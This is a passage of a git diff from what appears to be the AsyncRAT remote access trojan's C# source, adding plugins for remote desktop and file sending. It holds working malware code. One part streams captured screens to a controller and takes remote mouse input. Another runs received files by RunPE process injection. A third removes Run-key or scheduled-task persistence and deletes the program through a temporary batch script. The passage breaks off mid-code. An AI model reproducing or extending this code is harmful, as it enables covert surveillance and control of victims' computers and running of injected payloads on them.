+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs
new file mode 100644
index 0000000..f3b5d10
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs
@@ -0,0 +1,134 @@
+using Plugin.MessagePack;
+using Plugin.StreamLibrary;
+using Plugin.StreamLibrary.UnsafeCodecs;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Drawing;
+using System.Drawing.Imaging;
+using System.IO;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+using System.Windows.Forms;
+
+namespace Plugin
+{
+ public static class Packet
+ {
+ public static bool IsOk { get; set; }
+ public static void Read(object data)
+ {
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "remoteDesktop":
+ {
+ switch (unpack_msgpack.ForcePathObject("Option").AsString)
+ {
+ case "capture":
+ {
+ if (IsOk == true) return;
+ IsOk = true;
+ CaptureAndSend(Convert.ToInt32(unpack_msgpack.ForcePathObject("Quality").AsInteger), Convert.ToInt32(unpack_msgpack.ForcePathObject("Screen").AsInteger));
+ break;
+ }
+
+ case "mouseClick":
+ {
+ Point position = new Point((Int32)unpack_msgpack.ForcePathObject("X").AsInteger, (Int32)unpack_msgpack.ForcePathObject("Y").AsInteger);
+ Cursor.Position = position;
+ mouse_event((Int32)unpack_msgpack.ForcePathObject("Button").AsInteger, 0, 0, 0, 1);
+ break;
+ }
+
+ case "mouseMove":
+ {
+ Point position = new Point((Int32)unpack_msgpack.ForcePathObject("X").AsInteger, (Int32)unpack_msgpack.ForcePathObject("Y").AsInteger);
+ Cursor.Position = position;
+ break;
+ }
+
+ case "stop":
+ {
+ IsOk = false;
+ break;
+ }
+ }
+ break;
+ }
+ }
+ }
+
+ public static void CaptureAndSend(int quality, int Scrn)
+ {
+ Bitmap bmp = null;
+ BitmapData bmpData = null;
+ Rectangle rect;
+ Size size;
+ MsgPack msgpack;
+ IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(quality);
+ MemoryStream stream;
+ while (IsOk && Connection.IsConnected)
+ {
+ try
+ {
+ bmp = GetScreen(Scrn);
+ rect = new Rectangle(0, 0, bmp.Width, bmp.Height);
+ size = new Size(bmp.Width, bmp.Height);
+ bmpData = bmp.LockBits(new Rectangle(0, 0, bmp.Width, bmp.Height), ImageLockMode.ReadWrite, bmp.PixelFormat);
+
+ using (stream = new MemoryStream())
+ {
+ unsafeCodec.CodeImage(bmpData.Scan0, new Rectangle(0, 0, bmpData.Width, bmpData.Height), new Size(bmpData.Width, bmpData.Height), bmpData.PixelFormat, stream);
+
+ if (stream.Length > 0)
+ {
+ msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
+ msgpack.ForcePathObject("ID").AsString = Connection.Hwid;
+ msgpack.ForcePathObject("Stream").SetAsBytes(stream.ToArray());
+ msgpack.ForcePathObject("Screens").AsInteger = Convert.ToInt32(Screen.AllScreens.Length);
+ new Thread(() => { Connection.Send(msgpack.Encode2Bytes()); }).Start();
+ }
+ }
+ bmp.UnlockBits(bmpData);
+ bmp.Dispose();
+ }
+ catch
+ {
+ Connection.Disconnected();
+ break;
+ }
+ }
+ try
+ {
+ IsOk = false;
+ bmp?.UnlockBits(bmpData);
+ bmp?.Dispose();
+ GC.Collect();
+ }
+ catch { }
+ }
+
+ private static Bitmap GetScreen(int Scrn)
+ {
+ Rectangle rect = Screen.AllScreens[Scrn].Bounds;
+ try
+ {
+ Bitmap bmpScreenshot = new Bitmap(rect.Width, rect.Height, PixelFormat.Format32bppArgb);
+ using (Graphics gfxScreenshot = Graphics.FromImage(bmpScreenshot))
+ {
+ gfxScreenshot.CopyFromScreen(rect.Left, rect.Top, 0, 0, new Size(bmpScreenshot.Width, bmpScreenshot.Height), CopyPixelOperation.SourceCopy);
+ return bmpScreenshot;
+ }
+ }
+ catch { return new Bitmap(rect.Width, rect.Height); }
+ }
+
+ [DllImport("user32.dll")]
+ static extern void mouse_event(int dwFlags, int dx, int dy, uint dwData, int dwExtraInfo);
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs
new file mode 100644
index 0000000..9fec2d9
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs
@@ -0,0 +1,33 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient();
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..b332f15
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("9042b543-13d1-42b3-a5b6-5cc9ad55e150")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj
new file mode 100644
index 0000000..b7c097b
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj
@@ -0,0 +1,65 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {9042B543-13D1-42B3-A5B6-5CC9AD55E150}
+ Library
+ Properties
+ Plugin
+ RemoteDesktop
+ v4.0
+ 512
+ true
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+ true
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/StreamLibrary/Enums.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/Enums.cs
similarity index 93%
rename from AsyncRAT-C#/Client/StreamLibrary/Enums.cs
rename to AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/Enums.cs
index 83e58e3..e41e9ee 100644
--- a/AsyncRAT-C#/Client/StreamLibrary/Enums.cs
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/Enums.cs
@@ -1,4 +1,4 @@
-namespace Client.StreamLibrary
+namespace Plugin.StreamLibrary
{
public enum CodecOption
{
diff --git a/AsyncRAT-C#/Client/StreamLibrary/IUnsafeCodec.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/IUnsafeCodec.cs
similarity index 95%
rename from AsyncRAT-C#/Client/StreamLibrary/IUnsafeCodec.cs
rename to AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/IUnsafeCodec.cs
index bd8775e..b9b9e3b 100644
--- a/AsyncRAT-C#/Client/StreamLibrary/IUnsafeCodec.cs
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/IUnsafeCodec.cs
@@ -1,10 +1,10 @@
-using Client.StreamLibrary.src;
+using Plugin.StreamLibrary.src;
using System;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
-namespace Client.StreamLibrary
+namespace Plugin.StreamLibrary
{
public abstract class IUnsafeCodec
{
diff --git a/AsyncRAT-C#/Client/StreamLibrary/IVideoCodec.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/IVideoCodec.cs
similarity index 94%
rename from AsyncRAT-C#/Client/StreamLibrary/IVideoCodec.cs
rename to AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/IVideoCodec.cs
index 79fc22f..b44e840 100644
--- a/AsyncRAT-C#/Client/StreamLibrary/IVideoCodec.cs
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/IVideoCodec.cs
@@ -1,11 +1,11 @@
-using Client.StreamLibrary.src;
+using Plugin.StreamLibrary.src;
using System;
using System.Collections.Generic;
using System.Drawing;
using System.IO;
using System.Text;
-namespace Client.StreamLibrary
+namespace Plugin.StreamLibrary
{
public abstract class IVideoCodec
{
diff --git a/AsyncRAT-C#/Client/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs
similarity index 99%
rename from AsyncRAT-C#/Client/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs
rename to AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs
index 62e704e..50edcf1 100644
--- a/AsyncRAT-C#/Client/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs
@@ -1,4 +1,4 @@
-using Client.StreamLibrary.src;
+using Plugin.StreamLibrary.src;
using System;
using System.Collections.Generic;
using System.Drawing;
@@ -6,7 +6,7 @@ using System.Drawing.Imaging;
using System.IO;
using System.Text;
-namespace Client.StreamLibrary.UnsafeCodecs
+namespace Plugin.StreamLibrary.UnsafeCodecs
{
public class UnsafeStreamCodec : IUnsafeCodec
{
diff --git a/AsyncRAT-C#/Client/StreamLibrary/src/JpgCompression.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/JpgCompression.cs
similarity index 97%
rename from AsyncRAT-C#/Client/StreamLibrary/src/JpgCompression.cs
rename to AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/JpgCompression.cs
index 0f911b5..50a7e30 100644
--- a/AsyncRAT-C#/Client/StreamLibrary/src/JpgCompression.cs
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/JpgCompression.cs
@@ -2,7 +2,7 @@
using System.Drawing.Imaging;
using System.IO;
-namespace Client.StreamLibrary.src
+namespace Plugin.StreamLibrary.src
{
public class JpgCompression
{
diff --git a/AsyncRAT-C#/Client/StreamLibrary/src/LzwCompression.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/LzwCompression.cs
similarity index 98%
rename from AsyncRAT-C#/Client/StreamLibrary/src/LzwCompression.cs
rename to AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/LzwCompression.cs
index 2654908..e7e69e8 100644
--- a/AsyncRAT-C#/Client/StreamLibrary/src/LzwCompression.cs
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/LzwCompression.cs
@@ -2,7 +2,7 @@
using System.Drawing.Imaging;
using System.IO;
-namespace Client.StreamLibrary.src
+namespace Plugin.StreamLibrary.src
{
public class LzwCompression
{
diff --git a/AsyncRAT-C#/Client/StreamLibrary/src/NativeMethods.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/NativeMethods.cs
similarity index 95%
rename from AsyncRAT-C#/Client/StreamLibrary/src/NativeMethods.cs
rename to AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/NativeMethods.cs
index f8dbe91..a90a74c 100644
--- a/AsyncRAT-C#/Client/StreamLibrary/src/NativeMethods.cs
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/NativeMethods.cs
@@ -1,7 +1,7 @@
using System;
using System.Runtime.InteropServices;
-namespace Client.StreamLibrary.src
+namespace Plugin.StreamLibrary.src
{
public class NativeMethods
{
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile.sln b/AsyncRAT-C#/Plugin/SendFile/SendFile.sln
new file mode 100644
index 0000000..0363623
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SendFile", "SendFile\SendFile.csproj", "{8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {7C37EDD7-F956-4399-BA52-FD089A972A6A}
+ EndGlobalSection
+EndGlobal
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs
new file mode 100644
index 0000000..70a0271
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs
@@ -0,0 +1,211 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient(byte[] packet)
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+ Buffer = new byte[4];
+ MS = new MemoryStream();
+ Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+
+ new Thread(() =>
+ {
+ Packet.Read(packet);
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ Tick?.Dispose();
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ MS?.Dispose();
+ GC.Collect();
+ }
+ catch { }
+ }
+
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (!TcpClient.Connected || !IsConnected)
+ {
+ IsConnected = false;
+ return;
+ }
+ int recevied = SslClient.EndRead(ar);
+ if (recevied > 0)
+ {
+ MS.Write(Buffer, 0, recevied);
+ if (MS.Length == 4)
+ {
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
+ Debug.WriteLine("/// Plugin Buffersize " + Buffersize.ToString() + " Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize];
+ while (MS.Length != Buffersize)
+ {
+ int rc = SslClient.Read(Buffer, 0, Buffer.Length);
+ if (rc == 0)
+ {
+ IsConnected = false;
+ return;
+ }
+ MS.Write(Buffer, 0, rc);
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ if (MS.Length == Buffersize)
+ {
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
+ }
+ }
+ }
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleSendTo.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
similarity index 85%
rename from AsyncRAT-C#/Client/Handle Packet/HandleSendTo.cs
rename to AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
index faff4cb..b2e4958 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleSendTo.cs
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
@@ -4,9 +4,9 @@ using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
-using Client.MessagePack;
+using Plugin.MessagePack;
-namespace Client.Handle_Packet
+namespace Plugin.Handler
{
public class HandleSendTo
{
@@ -38,7 +38,6 @@ namespace Client.Handle_Packet
{
byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
- byte[] plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
if (injection.Length == 0)
{
//Reflection
@@ -69,9 +68,7 @@ namespace Client.Handle_Packet
{
try
{
- Assembly loader = Assembly.Load(plugin);
- MethodInfo meth = loader.GetType("Plugin.Plugin").GetMethod("Initialize");
- meth.Invoke(null, new object[] { buffer, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection) });
+ RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), buffer, true);
}
catch (Exception ex)
{
@@ -87,4 +84,5 @@ namespace Client.Handle_Packet
}
}
}
-}
\ No newline at end of file
+
+}
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs
new file mode 100644
index 0000000..8b36cb4
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs
@@ -0,0 +1,63 @@
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Text;
+using System.Windows.Forms;
+using System.IO;
+
+namespace Plugin.Handler
+{
+ public class HandleUninstall
+ {
+ public HandleUninstall()
+ {
+ if (Convert.ToBoolean(Plugin.Install))
+ {
+ try
+ {
+ if (!Methods.IsAdmin())
+ Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Plugin.InstallFile);
+ else
+ {
+ Process.Start(new ProcessStartInfo()
+ {
+ FileName = "schtasks",
+ Arguments = "/delete /f /tn " + @"""'" + Plugin.InstallFile + @"""'",
+ CreateNoWindow = true,
+ ErrorDialog = false,
+ UseShellExecute = false,
+ WindowStyle = ProcessWindowStyle.Hidden
+ });
+ }
+ }
+ catch { }
+ }
+
+ string batch = Path.GetTempFileName() + ".bat";
+ using (StreamWriter sw = new StreamWriter(batch))
+ {
+ sw.WriteLine("@echo off");
+ sw.WriteLine("timeout 3 > NUL");
+ sw.WriteLine("CD " + Application.StartupPath);
+ sw.WriteLine("DEL " + "\"" + Path.GetFileName(Application.ExecutablePath) + "\"" + " /f /q");
+ sw.WriteLine("CD " + Path.GetTempPath());
+ sw.WriteLine("DEL " + "\"" + Path.GetFileName(batch) + "\"" + " /f /q");
+ }
+ Process.Start(new ProcessStartInfo()
+ {
+ FileName = batch,
+ CreateNoWindow = true,
+ ErrorDialog = false,
+ UseShellExecute = false,
